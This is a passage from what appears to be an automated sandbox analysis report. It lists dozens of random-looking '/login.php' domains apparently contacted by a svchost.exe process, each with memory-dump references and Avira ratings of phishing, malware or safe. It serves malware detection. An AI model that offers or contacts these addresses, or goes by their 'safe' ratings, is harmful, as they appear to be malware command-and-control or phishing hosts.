                                                                                                                                                                                                            http://gacycaz.com/login.phpsvchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2578933083.0000000005F1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577903308.0000000005F16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2582339927.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygymod.com/(.svchost.exe, 00000001.00000003.2590518762.00000000073DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzybil.com/login.phpsvchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2830112848.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2830563308.000000000724E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2831366622.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyhoh.com/login.phpsvchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahynuw.com/login.phpsvchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadydow.com/login.phpsvchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612712767.000000000BE83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetylyv.com/svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qegyfyp.com/login.phpsvchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204802047.000000000721D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770277395.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204593821.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2722613480.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxygax.com/login.phpsvchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qexyhuv.com/login.phpC:svchost.exe, 00000001.00000002.2979374488.0000000007200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedyrag.com/login.phpsvchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795645814.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795133904.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedykiv.com/login.phpsvchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507955188.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzylol.com/login.phpsvchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809902914.000000000733B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vocypok.com/login.phpsvchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2841193808.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981273362.00000000073B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puvygyv.com/login.phpsvchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2645801459.000000000BE1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981213123.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974475260.0000000000885000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lymywaj.com/login.phpsvchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2501299413.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://purywoq.com/login.phpsvchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981213123.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetyveq.com/login.phpsvchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2584954171.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vocyzum.com/login.phpsvchost.exe, 00000001.00000003.2590737779.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volyquk.com/login.phpsvchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2524978481.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809902914.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.000000000735E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pupywog.com/login.phpsvchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795645814.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795133904.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedyruv.com/login.phpsvchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574085789.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577542227.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571204681.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2580215394.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedysyp.com/login.phpsvchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volycem.com/login.phpsvchost.exe, 00000001.00000003.2574085789.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577542227.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571204681.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2580215394.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyryled.com/svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzyduq.com/login.phpsvchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://purywyl.com/login.phpsvchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557869409.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574431699.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557409030.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojyzik.com/login.phpsvchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojydam.com/login.phpsvchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyvysur.com/svchost.exe, 00000001.00000003.2811743937.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802565524.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2521327598.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803526533.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808913849.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800699213.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809323268.00000000073DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pufybyv.com/login.phpsvchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2229330427.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770277395.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2198716545.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyciz.com/login.php3svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyzib.com/svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
